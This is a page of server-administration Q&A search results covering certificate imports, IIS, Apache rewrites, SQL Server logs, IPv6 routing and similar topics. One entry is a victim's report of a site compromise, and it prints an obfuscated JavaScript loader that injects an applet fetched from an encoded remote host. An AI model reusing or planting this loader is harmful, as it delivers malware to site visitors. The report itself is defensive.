Search Results

Search found 46973 results on 1879 pages for 'return path'.


  • HowTo import Certificate (pfx) with private key in WinXP

    - by Gunther
    Hello, I spent the whole day just trying to import a certificate in WinXP, but I always failed. I did the following. First, create the certificate with a private key (no password):

        makecert -sr LocalMachine -ss My -pe -sky exchange -n "CN=TestCert" -a sha1 -sv TestCert.pvk TestCert.cer

    Then put the certificate and private key together into a pfx file:

        pvk2pfx.exe -pvk TestCert.pvk -spc TestCert.cer -pfx TestCert.pfx

    Then import the pfx file with the command-line tool (German system):

        winhttpcertcfg.exe -i TestCert.pfx -a NT-AUTORITÄT\NETZWERKDIENST -c LOCAL_MACHINE\My

    Error: "Unable to import contents of PFX file. Please make sure the filename and path, as well as the password, are correct." (Hint: "NT-AUTORITÄT\NETZWERKDIENST" is the German name for "NT-AUTHORITY\NETWORKSERVICE".) The filename is ok, and no password was set. Even if I set a password (e.g. "MyPassword") in step 1 and append -p MyPassword at the end of step 3, I get the same error. Then I tried to import it in the certificate console (mmc with the certificates snap-in). There I got the following error: "Der private Schlüssel, den Sie importieren, erfordert möglicherweise einen Dienstanbieter, der nicht installiert ist." ("The private key you are importing may require a service provider that is not installed.") But the Microsoft crypto service is up and running. What else can I do? On Windows Vista and Windows 7 I got this running without these problems. I need this certificate to run a WCF service. Thanks in advance for any hint. Regards, Gunther
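
    One workaround worth trying (a sketch; certutil on XP comes from the Server 2003 Administration Tools Pack, so its availability is an assumption) is to split the job in two steps, importing first and granting key access second:

        rem import the pfx into LocalMachine\My; -p "" passes the empty password
        certutil -f -p "" -importpfx TestCert.pfx
        rem then grant the Network Service account access to the private key
        winhttpcertcfg -g -c LOCAL_MACHINE\My -s TestCert -a NETWORKSERVICE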

    Read the article

  • Getting 401 when using client certificate with IIS 7.5

    - by Jacob
    I'm trying to configure a web site hosted under IIS 7.5 so that requests to a specific location require client certificate authentication. With my current setup, I still get a "401 - Unauthorized: Access is denied due to invalid credentials" when accessing the location with my client cert. Here's the web.config fragment that sets things up:

        <location path="MyWebService.asmx">
          <system.webServer>
            <security>
              <access sslFlags="Ssl, SslNegotiateCert"/>
              <authentication>
                <windowsAuthentication enabled="false"/>
                <anonymousAuthentication enabled="false"/>
                <digestAuthentication enabled="false"/>
                <basicAuthentication enabled="false"/>
                <iisClientCertificateMappingAuthentication enabled="true" oneToOneCertificateMappingsEnabled="true">
                  <oneToOneMappings>
                    <add enabled="true" certificate="MIICFDCCAYGgAwIBAgIQ+I0z6z8OWqpBIJt2lJHi6jAJBgUrDgMCHQUAMCQxIjAgBgNVBAMTGURldiBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcNMTAxMjI5MjI1ODE0WhcNMzkxMjMxMjM1OTU5WjAaMRgwFgYDVQQDEw9kZXYgY2xpZW50IGNlcnQwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANJi10hI+Zt0OuNr6eduiUe6WwPtyMxh+hZtr/7eY3YezeJHC95Z+NqJCAW0n+ODHOsbkd3DuyK1YV+nKzyeGAJBDSFNdaMSnMtR6hQG47xKgtUphPFBKe64XXTG+ueQHkzOHmGuyHHD1fSli62i2V+NMG1SQqW9ed8NBN+lmqWZAgMBAAGjWTBXMFUGA1UdAQROMEyAENGUhUP+dENeJJ1nw3gR0NahJjAkMSIwIAYDVQQDExlEZXYgQ2VydGlmaWNhdGUgQXV0aG9yaXR5ghB6CLh2g6i5ikrpVODj8CpBMAkGBSsOAwIdBQADgYEAwwHjpVNWddgEY17i1kyG4gKxSTq0F3CMf1AdWVRUbNvJc+O68vcRaWEBZDo99MESIUjmNhjXxk4LDuvV1buPpwQmPbhb6mkm0BNIISapVP/cK0Htu4bbjYAraT6JP5Km5qZCc0iHZQJZuch7Uy6G9kXQXaweJMiHL06+GHx355Y="/>
                  </oneToOneMappings>
                </iisClientCertificateMappingAuthentication>
              </authentication>
            </security>
          </system.webServer>
        </location>

    The client certificate I'm using in my web browser matches what I've placed in the web.config. What am I doing wrong here?
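
    One thing worth ruling out (a sketch, assuming the default IIS install path; a server-level lock normally surfaces as a 500.19 rather than a 401, but it is quick to check) is whether these sections are unlocked for delegation to web.config:

        %windir%\system32\inetsrv\appcmd unlock config /section:system.webServer/security/access
        %windir%\system32\inetsrv\appcmd unlock config /section:system.webServer/security/authentication/iisClientCertificateMappingAuthentication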

    Read the article

  • Apache2 - mod_rewrite : RequestHeader and environment variables

    - by Guillaume
    I am trying to get the value of the request parameter "authorization" and store it in the "Authorization" header of the request. The first rewrite rule works fine. In the second rewrite rule, the value of $2 does not seem to be stored in the environment variable; as a consequence, the "Authorization" request header is empty. Any idea? Thanks.

        <VirtualHost *:8010>
            RewriteLog "/var/apache2/logs/rewrite.log"
            RewriteLogLevel 9
            RewriteEngine On
            RewriteRule ^/(.*)&authorization=@(.*)@(.*) http://<ip>:<port>/$1&authorization=@$2@$3 [L,P]
            RewriteRule ^/(.*)&authorization=@(.*)@(.*) - [E=AUTHORIZATION:$2,NE]
            RequestHeader add "Authorization" "%{AUTHORIZATION}e"
        </VirtualHost>

    I need to handle several cases because sometimes the parameters are in the path and sometimes they are in the query string, depending on the user. This last case fails; the header value for AUTHORIZATION looks empty.

        # if the query string includes the authorization parameter
        RewriteCond %{QUERY_STRING} ^(.*)authorization=@(.*)@(.*)$
        # keep the value of the parameter in the AUTHORIZATION variable and redirect
        RewriteRule ^/(.*) http://<ip>:<port>/ [E=AUTHORIZATION:%2,NE,L,P]
        # add the value of AUTHORIZATION in the header
        RequestHeader add "Authorization" "%{AUTHORIZATION}e"
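
    One observation on the first block: the [L,P] flags on the first rule stop rewrite processing for that request, so the second rule's E= flag never runs. A sketch that captures the token and proxies in a single rule (the backend host and port are placeholders):

        RewriteCond %{QUERY_STRING} authorization=@([^@]+)@
        RewriteRule ^/(.*) http://backend:8080/$1 [E=AUTHORIZATION:%1,NE,P,L]
        # mod_headers runs after mod_rewrite; env= guards against setting an empty header
        RequestHeader set Authorization "%{AUTHORIZATION}e" env=AUTHORIZATION
        # if the variable arrives renamed after an internal redirect, try %{REDIRECT_AUTHORIZATION}e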

    Read the article

  • How do I identify and fix the cause of transaction log growth on SIMPLE recovery model databases?

    - by Stuart B
    I recently upgraded our SQL Server 2008 installations to Service Pack 2. One of our databases is on the simple recovery model, but its transaction log is growing extremely fast. The path I'm currently investigating is that we have a transaction somewhere out there stuck in an active state. Here is why:

        select name, recovery_model_desc, log_reuse_wait_desc
        from sys.databases where name in ('SimpleDB')

        name      recovery_model_desc  log_reuse_wait_desc
        SimpleDB  SIMPLE               ACTIVE_TRANSACTION

    When I check my active transactions, I get the following. Note that I installed SP2 and restarted our server on 12/25 at around noon.

        select transaction_id, name, transaction_begin_time, transaction_type
        from sys.dm_tran_active_transactions

        transaction_id  name                          transaction_begin_time   transaction_type
        233             worktable                     2010-12-25 12:44:29.283  2
        236             worktable                     2010-12-25 12:44:29.283  2
        238             worktable                     2010-12-25 12:44:29.283  2
        240             worktable                     2010-12-25 12:44:29.283  2
        243             worktable                     2010-12-25 12:44:29.283  2
        245             worktable                     2010-12-25 12:44:29.283  2
        62210           tran_sp_MScreate_peer_tables  2010-12-25 12:45:00.880  1
        55422856        user_transaction              2010-12-28 16:41:56.703  1
        55422889        SELECT                        2010-12-28 16:41:57.303  2
        470             LobStorageProviderSession     2010-12-25 12:44:30.510  2

    Note that according to the documentation a transaction_type of 1 means read/write and 2 means read-only. So my line of thinking is that the tran_sp_MScreate_peer_tables transaction is stuck for some reason and is holding up transaction log truncation. Is this a plausible scenario? Correct me if my line of thinking is off, as I'm not a SQL Server expert. If this is correct, how do I get rid of that transaction so that my transaction log is truncated as usual?
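
    A sketch for pinning down the blocker (the transaction id is taken from the output above; killing a session is only safe once you know what it was doing):

        DBCC OPENTRAN('SimpleDB');  -- reports the oldest active transaction and its session id
        SELECT s.session_id, s.login_name, s.program_name
        FROM sys.dm_tran_session_transactions t
        JOIN sys.dm_exec_sessions s ON s.session_id = t.session_id
        WHERE t.transaction_id = 62210;
        -- KILL <session_id>;  -- after the rollback, the log should truncate at the next checkpoint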

    Read the article

  • solr php extension fails to run on newest Debian Wheezy

    - by hijarian
    I'm trying to use the Solr PHP extension on the recently-upgraded Debian Wheezy. It installs flawlessly, both from PECL and from source, but instead of giving me the expected functionality it gives me this on every PHP run:

        PHP Warning: PHP Startup: Unable to load dynamic library '/usr/lib/php5/20100525/solr.so' - /usr/lib/php5/20100525/solr.so: undefined symbol: curl_easy_getinfo in Unknown on line 0

    Scripts which use the extension also throw an error:

        PHP Error[2]: include(SolrClient.php): failed to open stream: No such file or directory in file <...path to my autoloader...>

    My main point is that it was set up before and worked like a charm. In the upgrade, among the relevant packages, only the versions of PHP and libcurl changed; the Solr instance itself was left as is. I have all possible libcurl libraries:

        $ locate libcurl
        ...
        /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.3
        /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4
        /usr/lib/x86_64-linux-gnu/libcurl-gnutls.so.4.2.0
        /usr/lib/x86_64-linux-gnu/libcurl.a
        /usr/lib/x86_64-linux-gnu/libcurl.la
        /usr/lib/x86_64-linux-gnu/libcurl.so
        /usr/lib/x86_64-linux-gnu/libcurl.so.3
        /usr/lib/x86_64-linux-gnu/libcurl.so.4
        /usr/lib/x86_64-linux-gnu/libcurl.so.4.2.0
        ...
        /usr/lib32/libcurl.so.3
        /usr/lib32/libcurl.so.4
        /usr/lib32/libcurl.so.4.2.0
        ...

    I have installed the php5-curl package version 5.4.4-2 with aptitude. I installed the Solr extension both with sudo pecl install solr (with various combinations of the -f and -n flags, and I tried solr-beta too) and from source with wget ... cd ... phpize && ./configure && make && make install. I'm installing version 1.0.2 of the extension because it worked before the upgrade from Squeeze to Wheezy. As I said earlier, the extension installs without any errors, and I have already added the extension=solr.so incantation to /etc/php5/mods-available/solr.ini. What magic should I do to make the solr extension work? Is the only solution I have to downgrade libcurl to the version from before the upgrade?
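
    A sketch for narrowing this down (the rebuild step assumes the undefined symbol comes from solr.so not being linked against libcurl itself):

        # does solr.so link libcurl directly? if nothing is listed, it relies on load order
        ldd /usr/lib/php5/20100525/solr.so | grep -i curl
        # confirm the curl extension is present, and loaded before solr
        php -m | grep -E 'curl|solr'
        # if it is a linkage problem, rebuilding against the current headers may help
        sudo apt-get install libcurl4-openssl-dev
        sudo pecl install -f solr-1.0.2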

    Read the article

  • Weblogic 12 and the CLI

    - by Rig
    I am working with WebLogic on Fedora 19 and am attempting to use the CLI tools, to no avail. It appears these were deprecated as far back as WebLogic 9; however, I was assured they are still there and still functional, and as it stands I have a need to use them if they are in fact functional. What appears to be the case is that the weblogic jar file is not being loaded correctly onto the classpath by this script, and it still fails after trying to add those jars to the classpath manually via java -classpath <path>. I've spent a lot of time so far trying to get this sorted out, but I'm wondering what I may be missing here. My Java runtime is version 7, Fedora is 19, and WebLogic is 12.1. When I run env after running the provided set-environment script, it appears to have no impact from what I can see (I'll add the details later when I get back to that machine). I'm mostly a Windows developer, so some of this is a topic I'm not well versed in.

        [foo@localhost bin]$ ./setDomainEnv.sh
        [foo@localhost bin]$ java weblogic.Admin -url t3://localhost:7001 -username <username> -password <password> HELP
        Error: Could not find or load main class weblogic.Admin
        [foo@localhost bin]$ ls -ltar
        total 72
        drwxr-x---  2 foo foo  4096 Jun  2 07:36 service_migration
        drwxr-x---  2 foo foo  4096 Jun  2 07:36 server_migration
        drwxr-x---  2 foo foo  4096 Jun  2 07:36 nodemanager
        -rwxr-x---  1 foo foo  1267 Jun  2 07:36 setStartupEnv.sh
        -rwxr-x---  1 foo foo  1105 Jun  2 07:36 startNodeManager.sh
        -rwxr-x---  1 foo foo  5765 Jun  2 07:36 startWebLogic.sh
        -rwxr-x---  1 foo foo  2001 Jun  2 07:36 stopWebLogic.sh
        -rwxr-x---  1 foo foo  3170 Jun  2 07:36 startManagedWebLogic.sh
        -rwxr-x---  1 foo foo  2776 Jun  2 07:36 stopManagedWebLogic.sh
        -rwxrwxrwx  1 foo foo 14136 Jun  2 07:36 setDomainEnv.sh
        -rwxr-x---  1 foo foo  2060 Jun  2 07:36 startComponent.sh
        drwxr-x---  5 foo foo  4096 Jun  2 07:36 .
        -rwxr-x---  1 foo foo  1726 Jun  2 07:36 stopComponent.sh
        drwxr-x--- 12 foo foo  4096 Jun  2 07:45 ..
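
    A sketch of the usual culprit here: running ./setDomainEnv.sh executes it in a subshell, so the CLASSPATH it builds disappears when the script exits. Sourcing it into the current shell keeps the environment (the weblogic.jar path below is the standard location, an assumption for this install):

        . ./setDomainEnv.sh
        java weblogic.Admin -url t3://localhost:7001 -username <username> -password <password> HELP
        # or point at weblogic.jar explicitly
        java -cp "$WL_HOME/server/lib/weblogic.jar" weblogic.Admin -url t3://localhost:7001 -username <username> -password <password> HELP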

    Read the article

  • How to create a shared lock blocking an intent exclusive lock

    - by FremenFreedom
    As I understand it, a SELECT statement will place a shared lock on the rows that it will return. While that SELECT is running, if an UPDATE statement comes along and needs to grab an intent exclusive lock, then that UPDATE statement will need to wait until the SELECT statement releases its shared locks. I am trying to test this SELECT shared-lock behavior by doing a BEGIN TRAN, then running a SELECT, not committing, and then running an UPDATE in another session on the exact same row. The UPDATE worked fine: no lock, no wait. So this must not be a valid way to simulate a shared lock blocking an intent exclusive lock? Can you give me a scenario where I can create a lock with a SELECT that would force an UPDATE to wait? I'm working with SQL Server 2000 and 2005 across a linked server: the table is on the 2005 instance, the SELECT is happening on 2000, and the UPDATE is executed from 2005. All in SSMS 2005.
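
    A sketch of one way to make a SELECT hold its shared locks (table and id are placeholders): under the default READ COMMITTED level, shared row locks are released as soon as each row has been read, which is why the open transaction alone blocks nothing. HOLDLOCK (equivalent to SERIALIZABLE) keeps them until the transaction ends:

        BEGIN TRAN;
        SELECT * FROM dbo.MyTable WITH (HOLDLOCK) WHERE id = 1;
        -- leave the transaction open; an UPDATE of the same row from another
        -- session should now wait until this transaction commits or rolls back
        -- COMMIT;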

    Read the article

  • Redmine subversion won't ignore certificate error even if told

    - by Pekka
    I have set up a copy of Redmine through the Bitnami Redmine Stack and am having trouble accessing a remote SVN repository through https. The trouble seems to be related to the fact that I don't have a signed certificate, and the certificate provided doesn't match the host name (I am accessing the same server through a number of host names). I am new to Ruby, Mongrel, Rails and Redmine. Following the advice in this forum thread, I changed the path Redmine uses to invoke the svn client in \apps\redmine\lib\redmine\scm\adapters\subversion_adapter.rb from

        SVN_BIN = "svn"

    to

        SVN_BIN = "svn --trust-server-cert --non-interactive --config-dir c:/user/temp"

    I was hoping that the --trust-server-cert option would fix the certificate problem. However, I am still getting the following error message in mongrel.log:

        svn: OPTIONS of 'https://server.xyz:8443/svn/reponame': Server certificate verification failed: certificate issued for a different hostname, issuer is not trusted (https://server.xyz:8443)

    Does anybody know what to do about this? Additional info:
        - I re-started the mongrel service after each change
        - I am sure the configuration change has taken effect because subversion has created a full configuration directory in c:\user\temp
        - I can access the remote repository using command-line svn with no problem
        - The remote repository runs on a Windows box with VisualSVN
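
    Note that --trust-server-cert only overrides the "unknown certificate authority" failure, not a hostname mismatch. A sketch of an alternative: run svn once, interactively, as the same account Redmine runs under, so the certificate is cached permanently in the config dir that Redmine passes to svn and later --non-interactive runs find it already trusted:

        svn list https://server.xyz:8443/svn/reponame --config-dir c:/user/temp
        rem answer "p" (accept permanently) at the certificate prompt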

    Read the article

  • Malware Cross Site Scripting attack / XSS Attack?

    - by user124176
    I have been hit by a Cross Site Scripting / XSS / RFI attack, and I can't find it anywhere in the source of the files; hashes on the files have not been changed, according to the OSSEC HIDS that I run with real-time monitoring on all web dirs. The attack happens on IE9 only, and it appends JavaScript code like the below (the "script" keyword is censored here as "scXXpt"). Notice that it starts after the /html tag closes normally:

        scXXpt language="javascXXpt"
        var enuwjo = function(gqumas, yhxxju, zbkpilf, xzzvhld){
            var xew = function(iso) {
                var crh, eaq, i; var owb="";
                crh = iso.length;
                for (i = 0; i < crh; ++i) { eaq = iso.charCodeAt(i)-2; owb = owb + String.fromCharCode(eaq); }
                return(owb);
            }
            var janlq=document.createElement(xew("crrngv"));
            janlq.setAttribute(xew("eqfg"), xew(gqumas));
            janlq.setAttribute(xew("ctejkxg"), xew("jvvr<11"+yhxxju));
            janlq.setAttribute(xew("ykfvj"), "1");
            janlq.setAttribute(xew("jgkijv"), "1");
            var lgtwyi=document.createElement(xew("rctco"));
            lgtwyi.setAttribute(xew("pcog"),xew(zbkpilf));
            lgtwyi.setAttribute(xew("xcnwg"),xew(xzzvhld));
            janlq.appendChild(lgtwyi);
            document.body.appendChild(janlq);
        };
        enuwjo("vxfgwtogg0dcrcmnwe0encuu","g{g0o{yge{0kp129;5","mlit{ttmdttponfhrrexihpe","fh;ccfe:85:5d9872;2;f569276h5268ff9;34:25;7d:8:7h8c68777;;822c73");

    No code has been changed on file as far as my HIDS says, but I can see the following in my error log:

        File does not exist: /var/www/vhosts/superkids.dk/ggtest/tvdeurmee

    In the access log, the following:

        IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc.class HTTP/1.1" 404 504 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"
        IP - - [09/Jun/2012:23:30:13 +0200] "GET /tvdeurmee/bapakluc/class.class HTTP/1.1" 404 509 "-" "Mozilla/4.0 (Windows 7 6.1) Java/1.7.0_04"

    Now, the folder or path /tvdeurmee/bapakluc/ does not exist on the server in question, nor does the Java class class.class, yet it still looks like a local call to the server, and it was getting a "404 File not found / 504 Gateway Timeout" (the attack was blocked by the local machine, hence the timeout / not found). Any idea on how to prevent the attack? I'm working on using HTML Purifier, but that might not be the correct idea, it seems, according to some replies I'm getting on their forum :) Kind regards, Steven

    Read the article

  • sudo: apache restarting a service on CentOS

    - by WaveyDavey
    I need my web app to restart the dansguardian service (on CentOS), so it needs to run /sbin/service dansguardian restart. I have a shell script in /home/topological called apacherestart.sh which does the following:

        #!/bin/sh
        id=`id`
        /sbin/service dansguardian restart
        r=$?
        exit $r

    This runs ok (a logger statement in the script, added for testing, outputs to syslog, so I know it's running). To make it run, I put this in /etc/sudoers:

        User_Alias APACHE=www
        # Cmnd alias specification
        Cmnd_Alias HTTPRESTART=/home/topological/apacherestart.sh,/sbin/e-smith/db,/etc/rc7.d/S91dansguardian
        # Defaults specification
        # User privilege specification
        root ALL=(ALL) ALL
        APACHE ALL=(ALL) NOPASSWD: HTTPRESTART

    So far so good, but the service does not restart. To test this I created a user david and fudged the uid/gid in /etc/passwd to be the same as www:

        www:x:102:102:e-smith web server:/home/e-smith:/bin/false
        david:x:102:102:David:/home/e-smith/files/users/david:/bin/bash

    then logged in as david and tried to run apacherestart.sh. The problem I get is:

        /etc/rc7.d/S91dansguardian: line 51: /sbin/e-smith/db: Permission denied

    even though S91dansguardian and db are in the sudoers command list. Any ideas?
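
    A note on the likely cause: entries in sudoers only apply to commands actually launched through sudo. Running apacherestart.sh directly keeps the caller's uid, so the commands the dansguardian init script invokes (such as /sbin/e-smith/db) are still denied. A sketch (the PHP call site is hypothetical):

        # from a shell, as david or www:
        sudo /home/topological/apacherestart.sh
        # from the web app, e.g. PHP (hypothetical call site):
        # shell_exec('sudo /home/topological/apacherestart.sh');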

    Read the article

  • Adobe Acrobat Pro 9.0 on Windows 7 print to network share gives error

    - by Archit Baweja
    I've recently upgraded a client's workstations to brand new computers with Windows 7 Professional. The server is still Windows Server 2003; it has 2-3 file shares that get mapped to users' workstations as drives. The client has also upgraded from Acrobat 6.0 to 9.0 Pro. Since the upgrade, when the client tries to print to the Adobe PDF printer (i.e., convert something to PDF via the printer interface), the job gives an error in the queue if the file is being saved on the network drive. If I instead provide a local path, the file "prints" fine. Additionally, if I change the Adobe PDF printer's settings to "don't spool, print directly to printer", it prints to the network share fine, but then it resets that setting every time. Things I've checked for:
        - Permissions on the network share: the user and the computer have full access; we even gave the "Everyone" object full access
        - Reinstalling Adobe Acrobat Pro 9.0
        - Running updates to upgrade to 9.3.4
    Has anyone else bumped into such a problem? The support fellows from Adobe are just taking me around in circles; they don't seem to have a clue either.

    Read the article

  • Drive XML returning Windows Volume Shadow Service Error

    - by Ssvarc
    I'm trying to image a SATA laptop hard drive, using DriveImageXML, that is attached to my computer via a USB adapter. I'm running Win7 Ultimate 64-bit. DriveImageXML is returning:

        Could not initialize Windows Volume Shadow Service (VSS).
        ERROR C:\Program Files (x86)\Runtime Software\DriveImage XML\vss64.exe failed to start.
        ERROR TIMEOUT
        Make sure VSSVC.EXE is running in your task manager. Click Help for more information.

    VSSVC.EXE is running in Task Manager, as is vss64.exe. Looking at the FAQ on the Runtime webpage, this turned up:

        Please verify in Settings - Control Panel - Administrative Tools - Services that the following services are enabled:
        MS Software Shadow Copy Provider
        Volume Shadow Copy
        Also make sure you are able to stop and start these services.
        Possible reasons for VSS failures:
        For VSS to work, at least one volume in your computer must be NTFS. If you use only FAT drives, VSS will not function. The required NTFS volume does not need to be identical with the volume you want to image.
        You should make sure that VSSVC.EXE is running in your task manager. If the problems persist, registering "oleaut.dll" and "oleaut32.dll" using "regsvr32" might help.

    Both of those services are running and can be started and stopped without issue. Using regsvr32 to register "oleaut32.dll" returns successful, but "oleaut.dll" returns:

        The module "oleaut.dll" failed to load. Make sure the binary is stored at the specified path or debug it to check for problems with the binary or dependent .DLL files. The specified module could not be found.

    Some other information that might be relevant: browsing to the drive is successful, but accessing certain folders returns an "access" error, and Windows runs a permissions adder that adds the current user profile to the NTFS permissions. Could this be the cause of the issue? DriveImage XML is running as Administrator. Thoughts?
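
    A quick sketch for checking VSS health from an elevated prompt (a failed writer or a missing provider usually explains initialization failures; the "oleaut.dll" regsvr32 failure is likely expected, since that module does not ship on Win7):

        vssadmin list writers
        vssadmin list providers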

    Read the article

  • How do you guys handle custom yum repository?

    - by luckytaxi
    I have a bunch of tools (nagios, munin, puppet, etc...) that get installed on all my servers. I'm in the process of building a local yum repository. I know most folks just dump all the rpms into a single folder (broken down into the correct path) and then run createrepo inside the directory. However, what would happen if you had to update the rpms? I ask because I was going to give each piece of software its own folder. Example one, put all packages inside one folder (custom_software):

        /admin/software/custom_software/5.4/i386
        /admin/software/custom_software/5.4/x86_64
        /admin/software/custom_software/4.6/i386
        /admin/software/custom_software/4.6/x86_64

    What I'm thinking of:

        /admin/software/custom_software/nagios/5.4/i386
        /admin/software/custom_software/nagios/5.4/x86_64
        /admin/software/custom_software/nagios/4.6/i386
        /admin/software/custom_software/nagios/4.6/x86_64
        /admin/software/custom_software/puppet/5.4/i386
        /admin/software/custom_software/puppet/5.4/x86_64
        /admin/software/custom_software/puppet/4.6/i386
        /admin/software/custom_software/puppet/4.6/x86_64

    This way, if I had to update to the latest version of puppet, I can manage the files accordingly. I wouldn't know which rpms belong to which software if I threw them into one big folder. Makes sense?
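
    A sketch of the update flow under the per-tool layout (paths from the example above; the .repo stanza and URL are assumptions for illustration):

        # refresh only the metadata for the tree that changed
        createrepo --update /admin/software/custom_software/puppet/5.4/x86_64
        # clients point at each tool via its own stanza, e.g. /etc/yum.repos.d/puppet.repo:
        # [local-puppet]
        # name=Local puppet packages
        # baseurl=http://repohost/custom_software/puppet/5.4/$basearch
        # enabled=1
        # gpgcheck=0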

    Read the article

  • Unable to connect to Adobe Connect

    - by ub3rst4r
    I am having trouble trying to connect to my college's Adobe Connect. I have done the test meeting connection and it will say "Unable to connect". I have tried connecting on 3 other computers and it works with flying colors. I am running Norton 360 on my computer, but I also tried it on my other laptop that's also running Norton 360, and it works on that laptop. I also checked my hosts file, and that is not the problem: the only thing in it is "127.0.0.1 localhost", and I am able to connect to the server on port 80 but not on the Adobe Connect port (port 1935). Here are the details from the log that the test created:

        Player Version: WIN 11,3,300,271
        App-Server returned: code:ok, servers=rtmp://connect.bowvalleycollege.ca:1935/_rtmp://localhost:8506/,rtmpt://connect.bowvalleycollege.ca:443/_rtmp://localhost:8506/
        ERROR: FMS Server did not return correctly!

    Here are my specifications: Windows 7 SP1 x64; Norton 360 v6.3 (latest); it won't connect in Firefox v15, Chrome v19, or IE9; all of my computers are connected through the same router (D-Link DIR-625). Any ideas?
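
    A sketch for confirming where the block is (the telnet client may need to be enabled under Windows features first):

        telnet connect.bowvalleycollege.ca 1935
        rem if this times out while port 80 connects, a local firewall rule (e.g. Norton's
        rem smart firewall) is the usual suspect; RTMPT over 443 is the fallback Connect tries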

    Read the article

  • File upload permissions issue on Windows Server 2008 R2 IIS 7.5 PHP 5.3 with Drupal v.7.26

    - by Taras
    I have a website on Drupal version 7.26. The OS on the server is Windows Server 2008 R2. Web server $_SERVER["SERVER_SOFTWARE"]: Microsoft-IIS/7.5; Server API: CGI/FastCGI; Core PHP version: 5.3.28. Relevant PHP settings:

        file_uploads: On
        post_max_size: 75M
        upload_max_filesize: 50M
        upload_tmp_dir: C:\inetpub\wwwroot\tmp
        memory_limit: 128M
        open_basedir: C:\inetpub\wwwroot;C:\inetpub\wwwroot\tmp

    When I go to /admin/config/media/file-system I see these error messages:

        The directory sites\default\files exists but is not writable and could not be made writable.
        The directory tmp exists but is not writable and could not be made writable.
        Public file system path: sites\default\files
        Temporary directory: tmp

    I have set permissions on the folders: C:\inetpub\wwwroot\tmp : IIS_IUSRS : Full control, and C:\inetpub\wwwroot\sites\default\files : IIS_IUSRS : Full control. I am working as the Administrator user:

        C:\Users\Administrator\Downloads> echo %username%
        Administrator

    I can't change the Read-only attribute for these folders. Every time I make the change, press Apply with "Apply changes to this folder, subfolders and files" checked, and press OK, it displays the "Applying attributes..." dialog; when it finishes, I press OK, closing the folder properties dialog. When I open the Properties dialog once again, I see Read-only is checked again. How can I fix it?
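
    A sketch of a more direct way to set this (the Read-only checkbox on folders is largely cosmetic in Windows; what matters to PHP is the ACL):

        icacls "C:\inetpub\wwwroot\sites\default\files" /grant "IIS_IUSRS:(OI)(CI)M" /T
        icacls "C:\inetpub\wwwroot\tmp" /grant "IIS_IUSRS:(OI)(CI)M" /T
        rem clear the attribute on any files that are actually flagged
        attrib -r "C:\inetpub\wwwroot\sites\default\files\*" /S /D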

    Read the article

  • FTP Server on AIX 6.1 returns - "A system call received a parameter that is not valid"

    - by Manglu
    The FTP server that is built into AIX (we are using version 6.1) returns this error message as a response code: "A system call received a parameter that is not valid". I am unable to see why the FTP server returns such a value as a response code. My search does not yield any results, and I am a bit dumbstruck about why this is happening. I can see some related reports which say the AIX server might return this strange-looking message when some concurrent I/O occurs, but I can't see anything in the context of the built-in FTP server. Looking for assistance.

    Read the article

  • Configure IPv6 routing

    - by godlark
    I've got IPv6 addresses from SixXS. My host is connected with the SixXS network over an AICCU tunnel (the "sixxs" interface). My host address is 2001:::2; the host on the other end has address 2001:::1. On my host, IPv6 is fully accessible. I have a problem with configuring the IPv6 network on VMs. I use VirtualBox, and the VM (Ubuntu) uses tap1 (bridged on the host by br0):

        #!/bin/sh
        PATH=/sbin:/usr/bin:/bin:/usr/bin:/usr/sbin
        # create a tap
        tunctl -t tap1
        ip link set up dev tap1
        # create the bridge
        brctl addbr br0
        brctl addif br0 tap1
        # set the IP address and routing
        ip link set up dev br0
        ip -6 route del 2001:6a0:200:172::/64 dev sixxs
        ip -6 route add 2001:6a0:200:172::1 dev sixxs
        ip -6 addr add 2001:6a0:200:172::2/64 dev br0
        ip -6 route add 2001:6a0:200:172::2/64 dev br0

    Host routing table:

        2001:6a0:200:172::1 dev sixxs  metric 1024
        2001:6a0:200:172::/64 dev br0  proto kernel  metric 256
        2001:6a0:200:172::/64 dev br0  metric 1024
        2000::/3 dev sixxs  metric 1024
        fe80::/64 dev eth0  proto kernel  metric 256
        fe80::/64 dev sixxs  proto kernel  metric 256
        fe80::/64 dev br0  proto kernel  metric 256
        fe80::/64 dev tap1  proto kernel  metric 256
        default via 2001:6a0:200:172::1 dev sixxs  metric 1024

    Guest: interface eth1 (it is connected with tap1):

        auto eth1
        iface eth1 inet6 static
            address 2001:6a0:200:172::3
            netmask 64
            gateway 2001:6a0:200:172::2

    Guest routing table:

        2001:6a0:200:172::/64 dev eth1  proto kernel  metric 256
        fe80::/64 dev eth0  proto kernel  metric 256
        fe80::/64 dev eth1  proto kernel  metric 256
        default via 2001:6a0:200:172::2 dev eth1  metric 1024

    The guest pings the host, the host pings the guest, and the host pings 2001:6a0:200:172::1, but the guest cannot ping 2001:6a0:200:172::1. When the guest tries to ping, I can capture its packets on the host (with tcpdump), but the host doesn't send them on to 2001:6a0:200:172::1. What have I missed in the configuration?
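
    A sketch of the piece that looks missing: for the host to carry the guest's packets from br0 out through the sixxs tunnel, it must route between interfaces, and IPv6 forwarding is off by default:

        sysctl -w net.ipv6.conf.all.forwarding=1
        # persist it (assuming /etc/sysctl.conf is used on this system)
        echo 'net.ipv6.conf.all.forwarding = 1' >> /etc/sysctl.conf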

    Read the article

  • Amazon EC2 - HTTPS - Certificate body is invalid. The body must not contain a private key

    - by Tam Minh
    I'm very new to Amazon EC2. I am trying to set up https for my website, following the official instructions from the Amazon docs: http://docs.aws.amazon.com/elasticbeanstalk/latest/dg/configuring-https.html. When I upload a signed certificate using the AWS command

        aws iam upload-server-certificate --server-certificate-name dichcumga --certificate-body file://mycert.pem --private-key file://signedkey.pem --certificate-chain file://mychain.pem

    I get this error:

        A client error (MalformedCertificate) occurred when calling the UploadServerCertificate operation: Certificate body is invalid. The body must not contain a private key.

    mycert.pem is a combination of private.pem and signedkey.pem (which was returned by VeriSign):

        copy private.pem+signedkey.pem mycert.pem

    Please help shed some light. Thank you in advance.
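
    A sketch of the fix the error itself suggests: pass the pieces separately instead of the concatenated file. --certificate-body wants only the signed certificate and --private-key only the key:

        aws iam upload-server-certificate --server-certificate-name dichcumga ^
            --certificate-body file://signedkey.pem ^
            --private-key file://private.pem ^
            --certificate-chain file://mychain.pem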

    Read the article

  • Why are symbolic links not working in MySQL?

    - by Eno
